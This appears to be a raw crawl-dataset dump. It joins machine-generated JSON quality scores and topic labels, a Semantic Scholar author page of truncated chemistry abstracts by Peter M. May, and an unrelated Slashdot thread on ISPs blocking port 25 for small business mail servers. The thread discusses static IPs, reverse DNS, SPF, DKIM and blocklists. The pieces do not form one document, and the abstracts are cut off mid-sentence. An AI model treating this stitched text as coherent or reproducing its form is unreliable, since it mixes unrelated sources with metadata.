"rps_doc_frac_chars_dupe_6grams": 0,
"rps_doc_frac_chars_dupe_7grams": 0,
"rps_doc_frac_chars_dupe_8grams": 0,
"rps_doc_frac_chars_dupe_9grams": 0,
"rps_doc_frac_chars_top_2gram": 0.022267209365963936,
"rps_doc_frac_chars_top_3gram": 0.024291500449180603,
"rps_doc_frac_chars_top_4gram": 0.03238866105675697,
"rps_doc_books_importance": -159.23997497558594,
"rps_doc_books_importance_length_correction": -157.12844848632812,
"rps_doc_openwebtext_importance": -90.0373764038086,
"rps_doc_openwebtext_importance_length_correction": -90.0373764038086,
"rps_doc_wikipedia_importance": -65.48468780517578,
"rps_doc_wikipedia_importance_length_correction": -65.47284698486328
},
"fasttext": {
"dclm": 0.07341200113296509,
"english": 0.8515785336494446,
"fineweb_edu_approx": 2.9565963745117188,
"eai_general_math": 0.006127119995653629,
"eai_open_web_math": 0.4452788233757019,
"eai_web_code": 0.00003158999970764853
}
}
|
{
"free_decimal_correspondence": {
"primary": {
"code": "615.19",
"labels": {
"level_1": "Industrial arts, Technology, and Engineering",
"level_2": "Medicine",
"level_3": "Materia medica, Drugs, and Pharmacy"
}
},
"secondary": {
"code": "616.192",
"labels": {
"level_1": "Industrial arts, Technology, and Engineering",
"level_2": "Medicine",
"level_3": "Pathology and Diseases"
}
}
},
"bloom_cognitive_process": {
"primary": {
"code": "2",
"label": "Understand"
},
"secondary": {
"code": "3",
"label": "Apply"
}
},
"bloom_knowledge_domain": {
"primary": {
"code": "1",
"label": "Factual"
},
"secondary": {
"code": "2",
"label": "Conceptual"
}
},
"document_type_v1": {
"primary": {
"code": "3",
"label": "Reference/Encyclopedic/Educational"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"extraction_artifacts": {
"primary": {
"code": "0",
"label": "No Artifacts"
},
"secondary": {
"code": "3",
"label": "Irrelevant Content"
}
},
"missing_content": {
"primary": {
"code": "0",
"label": "No missing content"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"document_type_v2": {
"primary": {
"code": "10",
"label": "Knowledge Article"
},
"secondary": {
"code": "17",
"label": "Product Page"
}
},
"reasoning_depth": {
"primary": {
"code": "2",
"label": "Basic Reasoning"
},
"secondary": {
"code": "1",
"label": "No Reasoning"
}
},
"technical_correctness": {
"primary": {
"code": "4",
"label": "Highly Correct"
},
"secondary": {
"code": "3",
"label": "Mostly Correct"
}
},
"education_level": {
"primary": {
"code": "2",
"label": "High School Level"
},
"secondary": {
"code": "1",
"label": "General Audience"
}
}
}
|
71f077df794da2774531b20248bb19b0
|
-8,249,785,451,441,035
|
Peter M. May
Learn More
Formation constants for the calcium(II), magnesium(II) and zinc(II) complexes of the orally effective iron chelator, pyridoxal isonicotinoyl hydrazone (PIH) and three analogues, pyridoxal benzoyl hydrazone (PBH), pyridoxalp-methoxybenzoyl hydrazone (PpMBH) and pyridoxalm-fluorobenzoyl hydrazone (PmFBH) have been determined by potentiometry at 25\dg C(More)
Formation constants for the calcium(II), copper(II), iron(II), magnesium(II), manganese(II) and zinc(II) complexes ofdl-NN'-dicarboxamidomethyl-NN'-dicarboxymethyl-1,2-diaminopropane (ICRF 198) and the 1,2-diamino-butane homologue (ICRF 226) have been measured potentiometrically at 37°C andI=150 mmol dm−3 [NaCl]. The constants are used in computer(More)
Estimates of the concentrations and identity of the predominant complexes of iron with the low-molecular-mass ligands in vivo are important to improve current understanding of the metabolism of this trace element. These estimates require a knowledge of the stability of the iron-citrate complexes. Previous studies on the equilibrium properties of the(More)
The ionic product of water, pK(w)=-log[H(+)][OH(-)], has been determined in aqueous solutions of sodium perchlorate over the concentration range of 1.0-8.0 M at 25 degrees C from high-precision potentiometric titrations carried out in cells with liquid junction using both glass and hydrogen electrodes. The glass electrode results are systematically lower(More)
Although the absolute concentrations of metal complexes in blood plasma are controlled by protein binding, the percentage distribution of transition metal ions amongst low molecular weight ligands is not. Thus, computer simulations which omit protein equilibria can nevertheless afford reliable information about such metals in the biofluid.
Formation constants for copper(II) and zinc(II) complexes of isonicotinoylhydrazine (isoniazid) and guanosine-5′-monophosphate have been measured potentiometrically at 37°C,I=150 mmol dm−3 [NaCl]. These constants have been used in computer models to assess the extent of complex formation by the drugin vivo. The simulations indicate that the predominant(More)
The metal complexing properties of two antihypertensive drugs, hydralazine (1-hydrazinophthalazine) and prizidilol (a hydrazinopyridazine), and some related ligands, have been studied using potentiometry, elemental analysis, spectrophotometry and computer simulation. The coordination chemistry of 1-hydrazinophthalazine and the hydrazinopyridazines is(More)
The thermodynamic database of the JESS (Joint Expert Speciation System) software package is described. It overcomes many existing problems associated with solution-chemistry databases. The system is fully interactive. Reactions can be expressed in any form. Any number of equilibrium constants, enthalpy, entropy and Gibbs-free energy values can be associated(More)
|
{
"url": "https://www.semanticscholar.org/author/Peter-M-May/9530874",
"source_domain": "www.semanticscholar.org",
"snapshot_id": "crawl=CC-MAIN-2017-43",
"warc_metadata": {
"Content-Length": "304867",
"Content-Type": "application/http; msgtype=response",
"WARC-Block-Digest": "sha1:PH2JBQCTZMOVQ6AGYWGBFYLXRROKWGHA",
"WARC-Concurrent-To": "<urn:uuid:6a7b1830-9ae1-4e58-9ac7-0dc0e9f87772>",
"WARC-Date": "2017-10-22T17:48:48Z",
"WARC-IP-Address": "52.41.123.25",
"WARC-Identified-Payload-Type": "text/html",
"WARC-Payload-Digest": "sha1:7ZUVTECH33INVGN52FCB3OBGEEYIHMEL",
"WARC-Record-ID": "<urn:uuid:a081b7c0-290d-4756-a2cc-a995bdade640>",
"WARC-Target-URI": "https://www.semanticscholar.org/author/Peter-M-May/9530874",
"WARC-Truncated": "length",
"WARC-Type": "response",
"WARC-Warcinfo-ID": "<urn:uuid:961b7b6e-1431-460c-a8d3-877d303b4e55>"
},
"warc_info": "robots: classic\r\nhostname: ip-10-165-76-76.ec2.internal\r\nsoftware: Nutch 1.6 (CC)\r\nisPartOf: CC-MAIN-2017-43\r\noperator: Common Crawl Admin\r\ndescription: Wide crawl of the web for October 2017\r\npublisher: Common Crawl\r\nformat: WARC File Format 1.0\r\nconformsTo: http://bibnum.bnf.fr/WARC/WARC_ISO_28500_version1_latestdraft.pdf"
}
|
{
"line_start_idx": [
0,
13,
14,
25,
384,
740,
1098,
1461,
1803,
2164,
2523
],
"line_end_idx": [
13,
14,
25,
384,
740,
1098,
1461,
1803,
2164,
2523,
2888
]
}
|
{
"red_pajama_v2": {
"ccnet_original_length": 2888,
"ccnet_original_nlines": 10,
"rps_doc_curly_bracket": 0,
"rps_doc_ldnoobw_words": 0,
"rps_doc_lorem_ipsum": 0,
"rps_doc_stop_word_fraction": 0.24444444477558136,
"rps_doc_ut1_blacklist": 0,
"rps_doc_frac_all_caps_words": 0.05000000074505806,
"rps_doc_frac_lines_end_with_ellipsis": 0,
"rps_doc_frac_no_alph_words": 0.2629629671573639,
"rps_doc_frac_unique_words": 0.598901093006134,
"rps_doc_mean_word_length": 6.55494499206543,
"rps_doc_num_sentences": 17,
"rps_doc_symbol_to_word_ratio": 0,
"rps_doc_unigram_entropy": 4.957824230194092,
"rps_doc_word_count": 364,
"rps_doc_frac_chars_dupe_10grams": 0,
"rps_doc_frac_chars_dupe_5grams": 0.05783737823367119,
"rps_doc_frac_chars_dupe_6grams": 0,
"rps_doc_frac_chars_dupe_7grams": 0,
"rps_doc_frac_chars_dupe_8grams": 0,
"rps_doc_frac_chars_dupe_9grams": 0,
"rps_doc_frac_chars_top_2gram": 0.014668899588286877,
"rps_doc_frac_chars_top_3gram": 0.026404019445180893,
"rps_doc_frac_chars_top_4gram": 0.020117349922657013,
"rps_doc_books_importance": -245.9849853515625,
"rps_doc_books_importance_length_correction": -245.9849853515625,
"rps_doc_openwebtext_importance": -131.3211669921875,
"rps_doc_openwebtext_importance_length_correction": -131.3211669921875,
"rps_doc_wikipedia_importance": -75.69572448730469,
"rps_doc_wikipedia_importance_length_correction": -75.69572448730469
},
"fasttext": {
"dclm": 0.030551789328455925,
"english": 0.8297864198684692,
"fineweb_edu_approx": 2.696162223815918,
"eai_general_math": 0.9083474278450012,
"eai_open_web_math": 0.6446627974510193,
"eai_web_code": 0.007961089722812176
}
}
|
{
"free_decimal_correspondence": {
"primary": {
"code": "546.0",
"labels": {
"level_1": "Science and Natural history",
"level_2": "Chemistry",
"level_3": "Chemistry, Inorganic"
}
},
"secondary": {
"code": "547.0",
"labels": {
"level_1": "Science and Natural history",
"level_2": "Chemistry",
"level_3": "Chemistry, Organic"
}
}
},
"bloom_cognitive_process": {
"primary": {
"code": "4",
"label": "Analyze"
},
"secondary": {
"code": "3",
"label": "Apply"
}
},
"bloom_knowledge_domain": {
"primary": {
"code": "2",
"label": "Conceptual"
},
"secondary": {
"code": "3",
"label": "Procedural"
}
},
"document_type_v1": {
"primary": {
"code": "2",
"label": "Academic/Research"
},
"secondary": {
"code": "3",
"label": "Reference/Encyclopedic/Educational"
}
},
"extraction_artifacts": {
"primary": {
"code": "0",
"label": "No Artifacts"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"missing_content": {
"primary": {
"code": "1",
"label": "Truncated Snippets"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"document_type_v2": {
"primary": {
"code": "3",
"label": "Academic Writing"
},
"secondary": {
"code": "8",
"label": "Documentation"
}
},
"reasoning_depth": {
"primary": {
"code": "4",
"label": "Advanced Reasoning"
},
"secondary": {
"code": "3",
"label": "Intermediate Reasoning"
}
},
"technical_correctness": {
"primary": {
"code": "4",
"label": "Highly Correct"
},
"secondary": {
"code": "3",
"label": "Mostly Correct"
}
},
"education_level": {
"primary": {
"code": "4",
"label": "Graduate/Expert Level"
},
"secondary": {
"code": "3",
"label": "Undergraduate Level"
}
}
}
|
71f077df794da2774531b20248bb19b0
|
-1,880,146,536,217,294,000
|
Want to read Slashdot from your mobile device? Point it at m.slashdot.org and keep reading!
Forgot your password?
typodupeerror
Communications The Internet Verizon
Ask Slashdot: Is There a War Against Small Mail Servers? 459
Posted by Soulskill
from the lazy-spam-prevention dept.
softegg writes "My company hosts our own mail server. We have high-speed business connections through Verizon and Comcast. Recently, Verizon and Comcast have been blocking port 25, causing our private mail server to stop functioning. Additionally, a lot of ISPs just started blocking any mail coming from any IP in the address block of cable modems. This caused us to start laundering our mail through a third-party service called DNSExit. Now, McAfee's MAPS anti-spam system tells us they are blocking DNSExit for spam. Essentially, we are finding ourselves increasingly cut off from sending any outgoing mail. What is a small company supposed to do if you want to host your own mail?"
This discussion has been archived. No new comments can be posted.
Ask Slashdot: Is There a War Against Small Mail Servers?
Comments Filter:
• Not much to do (Score:5, Informative)
by enec (1922548) * <[email protected]> on Monday February 21, 2011 @05:33PM (#35272714) Homepage
Most ISPs block outgoing port 25 because 99.99% of that traffic is viruses or otherwise malicious computers trying to send spam. Even more mail services block all dynamic pools used by major ISPs because of the same reason.
Just invest a few bucks a month into a cheap hosted VPS behind a static IP where you can run the server.
• Re: (Score:2, Insightful)
by Anonymous Coward
You have several options.
1) Get a real internet Service provider.
2) Host mail on a different server such as a vps
3) host mail on a different server and use Fetchmail to pull mail and send mail out bound.
4) Configure your server to send mail through your ISPs send mail server. Receiving mail may be a problem depending on ISP.
• by DJRumpy (1345787)
The correct action is to call Comcast or whoever your provider is and get an exception. Comcast at the time I had them, and Time Warner now, have no issue with someone running a server on a business contract. If you are using a personal (home) account and running one however, it shouldn't surprise you if you were blocked (I know the article says a business account but it's relevant to the discussion). Both stated that was against the TOS to run servers on 'home' accounts.
• Re: (Score:2, Informative)
by Anonymous Coward
Or stop using a dynamic IP for a business. I know static IPv4 addresses are an endangered species, but come on man.
• by pipatron (966506)
We have high-speed business connections through Verizon and Comcast
Would these be dynamic too?
• by dosius (230542)
Maybe, maybe not. I have "high speed" (4 Mbps ADSL) through Verizon and it's static IP, though I pay out the arm for it.
-uso.
• Re:Not much to do (Score:4, Informative)
by icebike (68054) on Monday February 21, 2011 @06:09PM (#35273180)
Or stop using a dynamic IP for a business. I know static IPv4 addresses are an endangered species, but come on man.
Agreed.
Our company has the business pacakge from Comcast which includes a static IP.
Its not a problem for our mail server. We don't get blocked, and our reverse is properly set up, and our IP is in a
non-dynamic pool. Yeah, we pay a tad more for this. But we can run all the services we want, and our mail
goes out.
Most of the blockage you get with dynamic SENDING IPs is on the the RECEIVING end, not always your local
ISP.
• by moco (222985)
Static IP is not enough. You also need your ISP to change the reverseDNS records or else you end up on many RBLs. Unfortunately, not many ISPs are willing to do that.
Anyway, you are better off sending your email "to the cloud", contracting an SMTP relaying service or renting a VPS if you can't afford a dedicated (T1/E1) connection.
• by yakatz (1176317)
You also need your ISP to change the reverseDNS records or else you end up on many RBLs. Unfortunately, not many ISPs are willing to do that.
Verizon is more than willing to change the DNS PTRs for anyone who calls the business support line and claims to be from the business that has the service.
When I called for the company I work for, they asked for our billing address and phone number, nothing more (and those are public information).
• by guybrush3pwood (1579937) on Monday February 21, 2011 @05:37PM (#35272770) Homepage
"First, they went after port 25, but I didn't care, because I didn't host my own mail server..."
blah blah blah, you know how it goes
• by EdIII (1114411)
It's not just the ISPs. This is a problem with SPAM in general.
If you are running a mail server on a dynamic IP address block that your ISP states cannot be running a mail server you are going to be on the Policy.Block.List.
Whether or not the ISP lets your traffic go out is irrelevant. It's whether or not my mail server will accept your connections. It won't. I do scrub incoming IP addresses with multiple RBL providers that I trust to give me fairly clean results. PBL's are included in this, so I won't
• So unfortunately due to a bunch of dickhead marketers and organized crime in foreign countries the email system is largely broken.
Foreign countries? Last time I checked, the USA was the clear leader in sending out spam. But indeed, this is not a problem with the servers. We are just trying to protect ourselves from spam. Blame the spammers. I report all unflagged spam to SpamCop, and by doing that I managed to make a few of them lose their accounts. It's kinda funny to see their responses, claiming they did not spam.
• by pipatron (966506)
due to a bunch of dickhead marketers and organized crime in foreign countries
Foreign if you're in europe maybe. Last time I checked, most spam originated from the US. Maybe it has changed the last year or two. Or maybe the dickhead marketers in the US vastly outnumber the organized crime (what's the difference, btw).
• Re:Not much to do (Score:4, Informative)
by PIBM (588930) on Monday February 21, 2011 @05:38PM (#35272792) Homepage
A lot of companies offer static ips for which you can set all the reverse dns & email information, and they are also out of their normal subscriber pool, thus allowing you to send emails from the computer behind it. The cost of that option is usually lower than 5$ per ip per month around here.
• What about those who send e-mails from their e-mail clients like Outlook? I send a lot of e-mails from my home PCs that use port 25 (SMTP) from Mozilla's SeaMonkey mail client. I don't like webmails.
• by mlts (1038732) *
Even if the traffic is not blocked, a lot of places will not accept mail if dumped through an IP address on a known dynamic range.
So, one needs to split mail two ways:
Incoming mail, cable ISPs tend to block just because. Telcos tend to allow incoming 25. This plus dynamic DNS solves this part.
Outgoing mail can be routed through the ISP's SMTP server, or if the mail volume is too much for that, there are third party outgoing SMTP services which act as relay hosts.
• by geohump (782273)
Both comcast and verizon's business services provide static IP addresses, and those addresses are not supposed to be in the dynamic IP blocks which each ISP provides to the various block list services.
If the ISP itself is blocking the outbound port 25 port, and/or reporting the IP they gave you as dynamic, complain bitterly, and sue. Begin the law suit immediately after they don't fix the problem within a few days after a written complaint. Solict other businesses who have been adversely affected and mount
• by raitchison (734047) * <[email protected]> on Monday February 21, 2011 @05:36PM (#35272756) Homepage Journal
If your ISP (Verizon and Comcast) are blocking port 25 outbound it doesn't sound like they think you have a "Business" connection. Check your contract/TOS for any provisions that would prevent you from running a server (common for residential cable connections but not for business) and if there isn't one call and complain. If they won't unblock port 25 for your mail server (assuming it's properly configured) you need to find a new ISP.
• Re: (Score:2, Informative)
>>>you need to find a new ISP.
That would be great, if the government had not given Comcast/Verizon an exclusive monopoly (or duopoly). And then decided not to regulate them.
Choice - we don't haze it.
• There are no DSL providers available in this area?
Even if there are not Cable or DSL providers there are always more traditional connectivity options, of course those might be cost prohibitive for a small company.
• by ScentCone (795499)
the government had not given Comcast/Verizon an exclusive monopoly
Which government ... your local city government?
• by jimicus (737525) on Monday February 21, 2011 @06:08PM (#35273164)
If your ISP is preventing 25 outbound, you don't have an ISP.
TBH, I'm not quite sure what you do have. I've met that sort of thing once before, I would describe them as a Web access provider.
• by dougmc (70836)
If your ISP is preventing 25 outbound, you don't have an ISP.
You are picking nits, but that setup for end users is quite common.
In most cases, 25/tcp isn't totally blocked outbound -- you can usually connect to the ISP's mail server and use it to relay your mail. That way, they get to make sure you're not spamming (and can monitor and control your mail if they want, though they could just do that by sniffing the network if they wanted too.)
• by v1 (525388)
It's been my experience that they block outgoing connections on port 25 to any ip except their mailserver. This prevents spamzombies from using external open relays or directly relaying to destination mailservers.
Sometimes the ISP's dns server requires authentication, which is ideal, but sometimes not. Even with their internal relay open though, it's very easy for them to monitor for abuse if the zombie figures out the IP address of the mailserver, and just cut it off. They usually then just cut off your
• It could be the block lists as well. Make sure you have a business class service with a static IP as those are least likely to be in the block lists. Also add "@ IN TXT v=spf1 mx ?all" and "domain.name IN TXT v=spf1 mx ?all" to your DNS zone record.
• Most residential providers block port 25. Part of it is they just don't want servers on residential connections but another part is spam prevention. 99.999% of home connections have no reason to run something on 25 and if they are, it just means their system is owned and spamming.
For servers, you need a business class line, which has no restrictions. I have a business class Cox cable line at home for that reason. Lets me have static IPs, no port blocking, more upstream, and no bandwidth limits. It does cost
• Comcast's idea of the Internet is an increasingly detached 'consumer endpoint' version of the Internet. If you're not in a rural area, then find a true Internet provider and move on.
• If you're in a rural area you probably don't have Comcast or Verizon anyway. Neither of them provide service for miles on any side of me.
• by Frosty Piss (770223) * on Monday February 21, 2011 @05:38PM (#35272786)
I haven't had this issue with Comcast Business (static IP). Port 25 works just fine. But, some recipients don't like us.
• by edmudama (155475) on Monday February 21, 2011 @06:03PM (#35273102)
My Comcast Business account explicitly allows servers on the static IP, including mail, web, etc. Anything allowed unless it's against the law in the local jurisdiction. If you go over bandwidth caps, they reserve the right to promote you automatically to the next tier of service. At the top tier, there are no caps.
It costs a little extra, but it seems to me like a business big enough to run it's own mail server should be able to afford the ~$75-100/mo for a business cable modem account.
• But, some recipients don't like us.
Check your DNS entries. A clean and proper DNS will help keep you off spam block lists.
• Over here in Australia quite a few ISPs will have port blocking like this turned on but they do provide you the option to disable it. It can even be done online via their user control panel.
Have you spoken to your ISPs about this issue?
• by way2trivial (601132) on Monday February 21, 2011 @05:40PM (#35272820) Homepage Journal
they only (so far as I know) block ports on residential accounts
you don't mention it, I suspect you are using a residential class account.
I have a comcast business account.. 2 actually.
pay for an account where the TOS allow servers... they won't block the port
before I had a 2nd commercial account, (at my home)
my biggest gripe was connections from my home to work
took too many hops to go 8 miles in very different ip ranges...
see if comcastbusiness.net is on the block lists you fear..
• Comcast & Verizon have been known to routinely treat business customers as residential customers. ,
• Usually when ISPs block port 25 (ostensibly because of all the botnets sending spam, a wise precaution that I advocate) they will provide a mail relay for their customers to connect to. They might not advertise it as that, but if your ISP (still?) provides a POP3 mail service, then they're going to give you an SMTP one too. Failing that, why not put a relay on any server you have in a datacenter or colocated? Configure it so only your computers can relay though it and it'll be fine.
• by shentino (1139071)
What if they block port 25 as an incentive for you to pay for SMTP access?
Anyone with a resource under their absolute control will be tempted to restrict access to it for economic reasons.
• this seems more like a casualty of war with spammers.
• I suspect that it is a mixture of "collateral damage in the war on spammers" and "convenient mechanism for price discrimination".
Back in the day, the ISPs could use the simple "dialup=cheap gits(unless they inquire about worldwide availability of dial-in numbers, in which case Soak 'em), T1=Soak 'em" heuristic to more or less distinguish between business and home users.
Now that a T1 is pitifully slow by consumer broadband standards(and, depending on location and providers, not much more reliable than
• by Omnifarious (11933) * <(eric-slash) (at) (omnifarious.org)> on Monday February 21, 2011 @05:41PM (#35272846) Homepage Journal
I've run my own mailserver for over a decade. It's IP has changed every few years if I switch ISPs, but otherwise it remains stable. I have a static IP on a DSL line and have reverse mappings set up. I have SPF records. I've registered with a whitelist. I've done everything I can. And still nobody who uses hotmail gets email from me. And I have increasing difficulty getting email to anybody else.
And I do not believe a single spam message has ever made it out from my network. I even block outgoing port 25 for the network segment my roommates use (when I have roommates) unless I'm administrating their computers.
This whole trend is really upsetting to me, and totally broken. I never have a problem sending email to someone with a gmail.com address, and they have the best spam filtering of any email provider I've ever used. The shortcut of blocking any DSL IP is clearly unnecessary if Google can do such a good job without it.
• by anom (809433)
I remember once upon a time when I was first setting up my mail server I experienced this exact problem. As I recall, there was some kind of hotmail-ish website I went to that helped me get its IP allowed by their system.
Here are some great resources on sending email to hotmail:
http://mail.live.com/mail/troubleshooting.aspx [live.com] (generic troubleshooting page for sending to hotmail)
https://postmaster.live.com/snds/ [live.com] (Signing up here lets you see what hotmail thinks of a specific IP, assuming you control RDNS
• by bcrowell (177657) on Monday February 21, 2011 @08:31PM (#35274302) Homepage
I've had similar problems.
The clueful email service providers are yahoo and gmail. They both support dkim and sign all their outbound mail with dkim. They both have mechanisms for reporting dkim-signed spam from their users ( http://mail.google.com/support/bin/request.py?hl=en&contact_type=abuse [google.com] and http://help.yahoo.com/l/us/yahoo/mail/classic/spam.html [yahoo.com] ). If you dkim-sign your own outgoing email, you can go through a process with yahoo http://help.yahoo.com/l/us/yahoo/mail/postmaster/forms_index.html [yahoo.com] to tell them that, and if the info you provide satisfies them, your mails are less likely to end up in users' spam boxes.
The one that doesn't work for me is AOL. Any email I send to their users goes straight to the bitbucket. I have never been able to find any mechanism for convincing them that I'm not a spammer. I'm sending mail from a dedicated server with a permanent IP address, SPF, DKIM, and reverse DNS all set up properly.
This whole trend is really upsetting to me, and totally broken. I never have a problem sending email to someone with a gmail.com address, and they have the best spam filtering of any email provider I've ever used. The shortcut of blocking any DSL IP is clearly unnecessary if Google can do such a good job without it.
It baffles me that some large email providers like hotmail and AOL don't implement DKIM. The added CPU load is negligible on a modern machine. I'm not saying that DKIM is a cure-all, but it works much better than these silly, ad hoc measures like blocking all vanity domains. If someone with a yahoo account sends spam to someone's gmail account, the user can report it to yahoo, yahoo can verify the dkim signature so they know it really came from that account, and they can deactivate the account. If someone sends spam to a gmail account, and they claim to be a yahoo user but they aren't, google can detect that it isn't properly signed and trash the mail.
• That's how this looks in a telnet port 25 session from a DSL line:
telnet mx2.hotmail.com 25
220 bay0-mc3-f21.Bay0.hotmail.com Sending unsolicited commercial or bulk e-mail
to Microsoft's computer network is prohibited. Other restrictions are found at h
ttp://privacy.msn.com/Anti-spam/. Violations will result in use of equipment loc
ated in California and other states. Mon, 21 Feb 2011 17:47:40 -0800
EHLO mine.home.net
250-bay0-mc3-f21.Bay0.hotmail.com (3.12.0.56) Hello [xxx.xxx.xxx.xxx]
250-SIZE 36909875
250-PIPELI
• by peacefinder (469349) <[moc.liamg] [ta] [ttiwed.nala]> on Monday February 21, 2011 @05:42PM (#35272862) Journal
I had a customer (a small town government) recently have port 25 outbound blocked by Comcast. After going around with Comcast for a bit, it turned out that they were subscribed to a residential-class service, which has port 25 outbound blocked by an implacable policy. The only way to get the port unblocked in this case would have been to move them to a business-class service with a static IP. (Fortunately the block wasn't a big deal for them, we were just using it for automated status reporting rather than running an inhouse mailserver.)
• I have Comcast business class, but I used to have Comcast at my home and both setups just required a call to customer service to ask to unblock port 25 because you're hosting your mailserver there. They're usually pretty helpful about doing what you need done - I even had them put in a reverse DNS (ptr) record for my mailserver's IP addy because some mailservers do reverse lookups to see if the IP points to a/the hostname (try "nslookup -> set q=ptr -> ip.add.re.ss" to check it) for spam control.
• Sounds like your company is extremely cheap & stupid for not just getting a real Internet connection. I don't blame companies for straight-up blocking any mail traffic originating from blocks of cable modem IPs...it's generally a source of illegitimate spam. Tell your boss to put down the money for a T1 to use for email. Route all other traffic through your cable connection.
• by nimbius (983462) on Monday February 21, 2011 @05:46PM (#35272920) Homepage
are inappropriate for small businesses yet continue to grow in popularity due to their heavy marketing and low cost.
Contact your local bell, or find a t1/t3 reseller, and let them know you need a fractional leased line. the cost is higher, but you get a real service level agreement to which the provider is contractually obligated.
using a dedicated/shared server for email hosting has its drawbacks. the shared server may become overloaded by spammer accounts and other users, and its generally not a priority for most hosting companies as they get very little money off a shared hosting sale. dedicated hosting is just as bad because you're commonly forced through one relay host, or a set of relay hosts that routinely become overwhelmed by spammers on your providers other dedicated hosting boxes. the dedicated and shared boxes are also notorious for floating in and out of various blacklists and sender reputation services, so you can expect mail to break-down about once every few weeks.
• Both Comcast and Verizon are inappropriate for small businesses yet continue to grow in popularity due to their heavy marketing and low cost. Contact your local bell, ...
Verizon would be his local bell.
• As someone who has both a 5 mig fiber to Qwest, and a Comcast business class, I disagree. While you are correct that there is no SLA, as long as it is not "full" it performs well, and give much more bang for the buck. But once the connection starts to saturate, performance goes down fast. Horses for courses.
• by Lehk228 (705449)
Verizon is one of the baby bells (bell atlantic)
• Most mail server software is capable of routing the outbound mail through the isp's mail server in such a way that it gets listed as the origin. You get to keep running your mail server, but the spam labelling and port blocking issues all go away.
The only time this is an issue is if the isp's mail servers do some kind of filtering or mangling, but most of the ones I've dealt with don't
• by sirsnork (530512)
This!
If he can't be bothered to call his ISP and ask them to unblock it, and really does have a Business account that allows server, then this is the solution. It's really quite simple to do on every mail server I've ever tried it on.
If you use SPF you may want to update the records for it to list your ISP's outbound IP addresses, but I'm guessing if there is outbound port 25 blocking issues going on and that required an Ask Slashdot then SPF isn't something in use :)
• Rent a dedicated server, or get your own co-location space. I have one that I pay $70 a month for with 1and1 [1and1.com]. I use 'em because I was able to install my own OS image on there, and they're generous with the bandwidth, although I'm not sure I'd run a company's e-mail server through them--the network connection can be flaky. About a year ago they went down after 5pm for an hour or so for a week or two due to a DDoS, then the last week they have been not accepting new connections (existing connections work fine
• by EMR (13768) on Monday February 21, 2011 @05:55PM (#35273026)
My dad's server is on Business Cable and Port 25 is not blocked and we have had no issues running our mail server on that connection.. Now one thing that we did do to aid in preventing us from being blocked is requesting our 5 IPs setup with reverse DNS entries to our domains instead of the Generic "ISP looking" ones that comcast assigns by default. You should contact Comcast and Verizon to set that up.
Also, make sure when you are testing if port 25 is "open" that you aren't yourself on an ISP that blocks 25 outbound. And make sure you setup port 587 (SMTP submission.. Authenticated SMTP) so that users can send mail from any ISP.
• by proxima (165692) on Monday February 21, 2011 @05:56PM (#35273048)
Even if you have a non-cable modem IP, it can be difficult to send (opt-in) business email from a small mail server. The reason is that spam filters at major email providers like Yahoo are turning to whitelisting [yahoo.com], and you have to contact each major provider to avoid getting your email sent straight to the spam filter.
Since the implementations of spam filters at the server level seem to vary quite a bit, I tend to avoid sending particularly important single emails through my own small email server for fear they just end up in the spam folder of the recipient.
That said, in general I wouldn't trust a business-class cable modem connection to host an email server for business purposes. Virtualized servers are commonplace now and quite affordable (I pay $15/mo for mostly personal use). Set up the backup on your own connection.
• Most likely your system is misconfigured and sending misdelivery reports rather than rejecting the smtp request in realtime or worse (open relay)
Comcast and Verizon are reacting by shutting you down...you have to beg to get it restored from what I understand...
There is no good solution for most of us other than to just relay thru comcasts SMTP server.
Comcasts user networks are in the subscriber block lists of many RBLs however typically business class accounts are exempted from these lists.
For outgo
• by Bigbutt (65939) on Monday February 21, 2011 @06:00PM (#35273090) Homepage Journal
I host my personal server with a Mosaic forum (Mosaic and Stained Glass.org) out of a CoLo in Florida. It's not the cheapest solution but I do get 100% access to the server to do what I want and a reasonable time on reboots when necessary.
Still, Microsoft will randomly block my mail for a month at a time with no recourse. I've attempted to contact them but they send me to a troubleshooting page which tells me I'm configured correctly but they still won't accept email. This wouldn't be too bad of a problem except that other ISPs use them to manage their e-mail. So I can't get any e-mail to Shaw.ca or AT&T in Canada. They don't even have a whitelist option for their users.
And there are a few smaller ISPs in the US that use anti spam blocking sites that don't have any way to let them know that I'm not spamming.
Most others though have contact information in their bounce and I've used it to check the various sites in the block list, then forward the results to the postmaster at the offended site. Then I get it opened up for the folks on the forum.
Heck, one ISP replied that I needed to get in touch with them and their Postmaster account won't accept further e-mail. I had to send them a note from my Yahoo account. Then they said it was a problem with my ISP and they should fix it. My ISP had no idea what they could do to fix it.
Even the company I work at, who uses MX-Logic can't receive e-mails from me because I'm not able to convince MX-Logic I'm not a spammer.
On the plus side, if I did want to spam Microsoft, they have a program where if I pay them, they'll open their servers up so I can send e-mail to their clients.
I'm not doing any real business on the server. I have my consulting website there but traffic is pretty much non-existent. The biggest impact is when the forum folk try to send the other folks e-mails (the PM notifications). I have a note in the Site Agreement to let folks know on shaw.ca, frontier, and the others that they might want to use a Yahoo e-mail to manage their forum account.
[John]
• by RogueWarrior65 (678876) on Monday February 21, 2011 @06:00PM (#35273094)
CableOne has blocked outgoing mail for years. It's annoying to have to reconfigure your mail program every time you travel somewhere. And it hasn't stopped the flow of prescription drug e-mails and Nigerian-ish scam e-mails. Hell, if all of those e-mail from barristers in foreign countries telling me a long lost relative left me several million dollars were real, I could by that 30,000 acre ranch in western Wyoming...and a helicopter. And why is it always a seven-figure inheritance? Wouldn't more stupid people believe $20,000?
• VPS (Score:4, Informative)
by dlevitan (132062) on Monday February 21, 2011 @06:02PM (#35273098)
Get a VPS. You can get one for $20/month and set up a full e-mail server on it. You'll get better hardware and better connectivity than your own server. Your IP will be seen as coming from a data center, not a cable modem pool of addresses. You can also host your own website, and leave the server you have at your office for internal things only. For mail access, just set up IMAP and SMTP with TLS, with the latter on port 587 (known as the submission port) which is generally not blocked like 25 is.
• by DigiShaman (671371) on Monday February 21, 2011 @06:03PM (#35273104) Homepage
Being that I setup SBS 2003 and SBS 2008 boxes, let me explain what you really need to make it work.
1. A business class ISP subscription. Along with this classification, you get a netblock of IP/s that (usually) wont be preemptively blacklisted by SORBS (I hate them).
2. Reverse DNS (PTR) record. Not having one is almost guaranteed to get your sent e-mails blocked. Getting one created is easy as pie if you subscribe to a business class ISP.
3. SPF record. They're many online wizards to help you create one. My favorite is from Microsoft.
4. DNS that will host TXT records. Needed for that SPF record you just created.
